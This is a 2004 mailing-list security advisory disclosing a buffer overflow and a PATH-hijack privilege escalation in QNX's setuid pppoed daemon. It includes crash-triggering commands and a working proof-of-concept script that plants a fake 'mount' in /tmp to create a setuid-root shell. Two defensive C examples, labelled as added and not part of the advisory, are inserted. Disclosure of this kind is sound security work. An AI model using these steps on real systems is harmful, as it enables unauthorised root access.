Date: 5 Sep 2004 14:25:11 -0000
From: Julio Cesar Fort <julio@...slabs.com.br>
To: bugtraq@...urityfocus.com
Subject: [RLSA_01-2004] QNX PPPoEd local root vulnerabilities




                *** rfdslabs security advisory ***

Title: QNX PPPoEd local root vulnerabilities [RLSA_01-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: http://www.qnx.com
Date: 02 Sep 2004

Author: Julio Cesar Fort <julio at rfdslabs com br>


1. Introduction

   The PPPoEd daemon provides a PPPoE connection, such as DSL, for QNX
users. More information can be found at QNX Developer Support:
www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html
There are two vulnerabilities that can lead to local root access.

2. Details

#1 Buffer overflow

   PPPoEd has multiple bounds-checking problems. Almost every flag given an
oversized value crashes PPPoEd, overwriting memory. Since the binary is
installed setuid root by default, an attacker can execute arbitrary
instructions to elevate privileges. Below is an example that triggers the
overflow.

$ export overflow256='AAAAAAAAAAAAAAA(...)' (around 256 A's)
$ /usr/bin/pppoed -F $overflow256
Memory fault (core dumped)
$ /usr/bin/pppoed service=$overflow256
Memory fault (core dumped)
...
The same happens with the 'name', 'en', 'upscript', 'downscript', 'retries',
'timeout', 'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and
'local_mac' flags.
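The defect described above is a parser that copies option values into fixed-size fields without checking their length. The following is an added example, not code from the advisory or from QNX's pppoed: a small key=value option parser with the bounds checks such a daemon needs. The field size (OPT_MAX), the struct and the three option names handled are assumptions made for illustration; the point is that an oversized value is rejected with an error code instead of being written past the end of the field.

```c
/* Added example (not pppoed's code): bounded parsing of key=value options.
 * A vulnerable parser would strcpy() the value into a fixed field; this one
 * refuses anything that does not fit, so "service=AAAA...(256 A's)" becomes
 * an error return rather than a memory fault. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define OPT_MAX 64   /* assumed field size, chosen for the example */

struct pppoe_opts {          /* hypothetical option storage */
    char service[OPT_MAX];
    char name[OPT_MAX];
    char upscript[OPT_MAX];
};

/* Copy src into dst[cap]. Returns 0 on success, -1 if it would not fit.
 * Unlike strcpy(), this never writes beyond dst and always terminates. */
static int bounded_copy(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (n >= cap)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Parse one "key=value" argument. Returns 0 on success, -1 if the value
 * is too long for its field, -2 if the key is unknown or malformed. */
int parse_option(const char *arg, struct pppoe_opts *o)
{
    const char *eq = strchr(arg, '=');
    if (eq == NULL || eq == arg)
        return -2;
    size_t klen = (size_t)(eq - arg);
    const char *val = eq + 1;

    if (klen == 7 && strncmp(arg, "service", 7) == 0)
        return bounded_copy(o->service, sizeof o->service, val);
    if (klen == 4 && strncmp(arg, "name", 4) == 0)
        return bounded_copy(o->name, sizeof o->name, val);
    if (klen == 8 && strncmp(arg, "upscript", 8) == 0)
        return bounded_copy(o->upscript, sizeof o->upscript, val);
    return -2;
}

/* Demonstration helper: build "service=" followed by len A's (constructed
 * input, capped at 1024) and return the parser's verdict on it. */
int try_service_len(size_t len)
{
    char buf[8 + 1024 + 1];
    struct pppoe_opts o;
    if (len > 1024)
        len = 1024;
    memset(&o, 0, sizeof o);
    memcpy(buf, "service=", 8);
    memset(buf + 8, 'A', len);
    buf[8 + len] = '\0';
    return parse_option(buf, &o);
}

int main(void)
{
    struct pppoe_opts o;
    memset(&o, 0, sizeof o);
    printf("service=isp -> %d\n", parse_option("service=isp", &o));   /* 0  */
    printf("service=<256 A's> -> %d\n", try_service_len(256));        /* -1 */
    return 0;
}
```

The same pattern applies to each of the flags listed above: every copy into a fixed buffer goes through bounded_copy (or an equivalent such as snprintf with a checked return), and the daemon exits with a usage error on -1 instead of continuing with a corrupted stack or heap.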


#2 Old $PATH trick

   PPPoEd calls "mount -T io-net npm-pppoe.so" without a full path, so the
'mount' binary is located through the caller's $PATH. Anyone who wants to
trick PPPoEd into executing code of their own can do so by modifying $PATH:
with /tmp placed first, '/usr/sbin/pppoed' will simply execute the 'mount'
(hostile code) it finds in the /tmp directory. Simple proof-of-concept steps
are below.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x    1 sandimas users          88 Aug  25 2004 mount
-rwsrwxrwx    1 root     100        153384 Jun  22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#
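The fix for this class of bug is on the privileged program's side: name the helper by an absolute path and never let the invoking user's environment reach it. The following is an added example, not code from the advisory or from QNX's pppoed, showing how a setuid program should launch a helper such as mount. The hard-coded PATH value and the use of /bin/sh as a stand-in for the real mount command are assumptions made so the block runs anywhere.

```c
/* Added example (not pppoed's code): invoking a helper from a setuid
 * program without a $PATH lookup. Two rules are enforced: the helper is
 * an absolute path, and the child gets a fixed environment (clean_env)
 * rather than the one inherited from the user who ran the program. */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for the helper. The PATH value is an assumed, system-
 * appropriate list of root-owned directories; nothing exported by the
 * invoking user (PATH, IFS, LD_*, ...) survives into the child. */
static char *const clean_env[] = {
    "PATH=/sbin:/bin:/usr/sbin:/usr/bin",
    "IFS= \t\n",
    NULL
};

/* Return 1 if cmd is acceptable as a helper path: absolute and free of
 * ".." components. A bare "mount" is rejected outright. */
int helper_path_ok(const char *cmd)
{
    if (cmd == NULL || cmd[0] != '/')
        return 0;
    const char *p = cmd;
    while ((p = strstr(p, "..")) != NULL) {
        int at_start = (p == cmd || p[-1] == '/');
        int at_end = (p[2] == '\0' || p[2] == '/');
        if (at_start && at_end)
            return 0;
        p += 2;
    }
    return 1;
}

/* Return the PATH the child will see, taken from clean_env; the caller's
 * exported PATH (e.g. "/tmp:...") plays no part. */
const char *child_path(void)
{
    for (int i = 0; clean_env[i] != NULL; i++)
        if (strncmp(clean_env[i], "PATH=", 5) == 0)
            return clean_env[i] + 5;
    return NULL;
}

/* Run helper cmd with argv under clean_env and wait for it. Returns the
 * child's exit status, or -1 if the path is rejected or fork/exec/wait
 * fails. execve() is used deliberately: unlike execvp() or system(), it
 * performs no PATH search at all. */
int run_helper(const char *cmd, char *const argv[])
{
    if (!helper_path_ok(cmd)) {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(cmd, argv, clean_env);
        _exit(127);                    /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Stand-in for "mount -T io-net npm-pppoe.so": /bin/sh is used here
     * only so the example runs on any system; the shape is the same. */
    char *const ok_argv[] = { "/bin/sh", "-c", "exit 0", NULL };
    char *const bad_argv[] = { "mount", "-T", "io-net", "npm-pppoe.so", NULL };
    printf("absolute helper: %d\n", run_helper(ok_argv[0], ok_argv));   /* 0  */
    printf("bare 'mount': %d\n", run_helper(bad_argv[0], bad_argv));   /* -1 */
    return 0;
}
```

With this structure the PoC above has nothing to hijack: the helper is resolved from a literal path chosen at build time, and the /tmp entry the attacker prepended to $PATH is never consulted because the child's PATH is replaced before the exec.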

3. Solution

   rfdslabs tried to contact QNX Software Systems but no security staff e-mail
was found. No solution yet.

4. Timeline

27 Aug 2004: Vulnerabilities detected;
28 Aug - 01 Sep: Looking for QNX security staff contact e-mail: no success;
02 Sep 2004: Advisory written and sent to security mail-lists.

Thanks to DataStorm Technologies, Lucien Rocha and everyone at rfdslabs.

www.rfdslabs.com.br - computers, sex, human mind and more
Recife, PE, Brazil

--- message sent for the second time ---

